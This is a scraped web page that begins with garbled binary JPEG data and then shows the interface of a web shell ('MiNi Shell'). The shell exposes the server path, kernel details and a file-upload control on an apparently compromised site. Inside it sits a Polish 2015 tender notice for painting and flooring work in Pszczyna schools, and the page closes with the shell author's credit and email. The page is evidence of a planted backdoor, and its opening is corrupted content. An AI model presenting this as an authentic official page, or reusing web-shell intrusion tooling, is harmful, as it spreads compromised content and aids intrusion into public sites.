JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150420/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150420/55215-N-2015.html

<p class="kh_header"><b>Pszczyna: Zadanie 1 -  Roboty malarskie w Zespole Szkolno Przedszkolnym w Jankowicach   
                      przy ul. Baziowej 17

Zadanie  2-  Roboty malarskie w Zespole Szkolno  Przedszkolnym w Łące  przy ul. Fitelberga 1

Zadanie 3 -  Roboty malarskie i posadzkarskie  w Publicznym Przedszkolu nr 7 w Pszczynie 
                     przy ul. Staromiejskiej 41.</b><br>
<b>Numer ogłoszenia: 55215 - 2015; data zamieszczenia: 20.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1 -  Roboty malarskie w Zespole Szkolno Przedszkolnym w Jankowicach   
                      przy ul. Baziowej 17

Zadanie  2-  Roboty malarskie w Zespole Szkolno  Przedszkolnym w Łące  przy ul. Fitelberga 1

Zadanie 3 -  Roboty malarskie i posadzkarskie  w Publicznym Przedszkolu nr 7 w Pszczynie 
                     przy ul. Staromiejskiej 41..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
Zadanie  obejmuje malowanie wybranych pomieszczeń tj:  sali gimnastycznej , magazynu sprzętu sportowego , balkonu  i pomieszczenia nauczyciela w-fu  w Zespole Szkolno Przedszkolnym w Jankowicach  w zakresie:
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą emulsyjną Akrylatex W z przygotowaniem i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowanie farbą olejna konstrukcji stalowej i blach sufitowych  z przygotowaniem powierzchni do malowania 
  w sali gimnastycznej 
- demontażu i ponownego montażu drabinek gimnastycznych i siatek zabezpieczających
- malowania rur i drobnych elementów metalowych 
- obustronne mycie okien w sali gimnastycznej 
- montażu rusztowań przesuwnych 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Zadanie 2
Zadanie obejmuje   malowanie wybranych pomieszczeń  tj: pomieszczeń w przedszkolu w części dla najmłodszych dzieci , kuchni wraz z zapleczem , sali zajęć nr 37 i 40  w Zespole Szkolno Przedszkolnym  w Łące  w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą emulsyjną Akrylatex W z przygotowaniem i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania rur i drobnych elementów metalowych 
- lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Zadanie 3
Zadanie obejmuje  malowanie ścian i sufitów oraz wymianę wykładziny wraz z remontem podłoża w  sali -zerówki w Publicznym Przedszkolu nr 7 w Pszczynie w zakresie :
- likwidacji pęknięć 
- dwukrotnego malowania ścian i sufitów farbą emulsyjną akrylową  z gruntowaniem i przygotowaniem podłoża,
- dwukrotnego malowania z jednokrotnym szpachlowaniem  farbą olejną lamperii ,
- lakierowania stolarki drzwiowej 
- malowania rur i drobnych elementów  farbą olejną
- demontażu wykładziny i listew przyściennych 
- przygotowania podłoża pod posadzki,
- ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na wysokość ok. 15 cm
- montaż listwy aluminiowej -progowej
- wywóz i utylizacje gruzu i materiałów z rozbiórki zgodnie z obowiązującymi przepisami prawa.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt. 6 Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości :   
      Zadanie 1   -     600,00  zł.  ( słownie : sześćset złotych )
      Zadanie 2   -     500,00  zł.  ( słownie : pięćset złotych )
      Zadanie 3   -     300,00  zł.  ( słownie : trzysta  złotych)
      należy wnieść w terminie   05.05.2015 r.  do godz. 1100 przed upływem terminu składania ofert.
       Wadium w  formie innej niż pieniądz,  dopuszczonej art.45 ust 6 Prawa zamówień publicznych (Dz.U.nr223 
       poz.1655 z 2007 r.). należy złożyć w formie oryginału  w kasie PZE, czynnej :  
                                                                                     w godz.    700  - 1430  ( środa, piątek)
	         		                                          w godz.  1200  - 1430 (wtorek)
     Gwarancja zapłaty wadium winna  być  bezwarunkowa i płatna na pierwsze żądanie.
     Wadium wniesione w pieniądzu należy wpłacić przelewem  na  konto : 
     ING Bank Śląski o/Pszczyna -  Pszczyński  Zarząd Edukacji - nr 80 1050 1070 1000 0090 3028 5937
     Potwierdzeniem dokonania wpłaty wadium jest uznanie kwotą wadium rachunku Zamawiającego ( wpływ
     środków  na rachunek   Zamawiającego przed upływem terminu składania ofert).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy , że  nie zalega z opłacaniem podatków, opłat oraz  składek na ubezpieczenie zdrowotne  i społeczne,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja na roboty budowlane  i materiały  1 pkt.  za 3 lata , 5 pkt. za 4 lata , 10 pkt. za 5 lat. - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może być dokonana tylko w sytuacji, gdy konieczność wprowadzenia takich zmian   wyniknie w rezultacie zdarzeń, których w chwili zawarcia umowy nie można było przewidzieć, którym nie można   było zapobiec, ani którym nie można przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub   w całości jego zadania.   Zamawiający   przewiduje zmiany umowy w przypadkach :
1.	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
2.	wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
3.	niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy (w szczególności choroby, wypadku losowego, nieprzewidzianej  zmiany   organizacyjnej).
18.7.4    zmiana podwykonawcy robót w trakcie realizacji umowy za zgodą Zamawiającego
 Zmiana postanowień umowy z uwagi na wystąpienie powyższych lub innych okoliczności niezależnych od    
Wykonawcy, może    nastąpić pod warunkiem wyrażenia zgody przez Zamawiającego.  .
Wszelkie zmiany uzupełnienia  umowy wymagają zachowania formy pisemnej w postaci aneksu do umowy 
podpisanego przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
            43-200 Pszczyna
            ul. Zdrojowa 4
            tel.(32) 210-21-93 ,  fax wew.118 lub 115
pokój 115..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2015 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
            43-200 Pszczyna
            ul. Zdrojowa 4
            tel.(32) 210-21-93 ,  fax wew.118 lub 115
pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 -  Roboty malarskie w Zespole Szkolno Przedszkolnym w Jankowicach   
                      przy ul. Baziowej 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  obejmuje malowanie wybranych pomieszczeń tj:  sali gimnastycznej , magazynu sprzętu sportowego , balkonu  i pomieszczenia nauczyciela w-fu  w Zespole Szkolno Przedszkolnym w Jankowicach  w zakresie:
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą emulsyjną Akrylatex W z przygotowaniem i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowanie farbą olejna konstrukcji stalowej i blach sufitowych  z przygotowaniem powierzchni do malowania 
  w sali gimnastycznej 
- demontażu i ponownego montażu drabinek gimnastycznych i siatek zabezpieczających
- malowania rur i drobnych elementów metalowych 
- obustronne mycie okien w sali gimnastycznej 
- montażu rusztowań przesuwnych 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancj ana roboty budowlane i materiały 1 pkt za 3 lata , 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie  2-  Roboty malarskie w Zespole Szkolno  Przedszkolnym w Łące  przy ul. Fitelberga 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje   malowanie wybranych pomieszczeń  tj: pomieszczeń w przedszkolu w części dla najmłodszych dzieci , kuchni wraz z zapleczem , sali zajęć nr 37 i 40  w Zespole Szkolno Przedszkolnym  w Łące  w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą emulsyjną Akrylatex W z przygotowaniem i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania rur i drobnych elementów metalowych 
- lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty budowlane i materiały : 1 pkt za 3 lata , 5 kt. za 4 lat, 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 -  Roboty malarskie i posadzkarskie  w Publicznym Przedszkolu nr 7 w Pszczynie 
                     przy ul. Staromiejskiej 41.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje  malowanie ścian i sufitów oraz wymianę wykładziny wraz z remontem podłoża w  sali - zerówki-  w Publicznym Przedszkolu nr 7 w Pszczynie w zakresie :
- likwidacji pęknięć 
- dwukrotnego malowania ścian i sufitów farbą emulsyjną akrylową  z gruntowaniem i przygotowaniem podłoża,
- dwukrotnego malowania z jednokrotnym szpachlowaniem  farbą olejną lamperii ,
- lakierowania stolarki drzwiowej 
- malowania rur i drobnych elementów  farbą olejną
- demontażu wykładziny i listew przyściennych 
- przygotowania podłoża pod posadzki,
- ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na wysokość ok. 15 cm
- montaż listwy aluminiowej -progowej
- wywóz i utylizacje gruzu i materiałów z rozbiórki zgodnie z obowiązującymi przepisami prawa
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty budowlane i materiały : 1 pkt za 3 lata , 5 kt. za 4 lat, 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com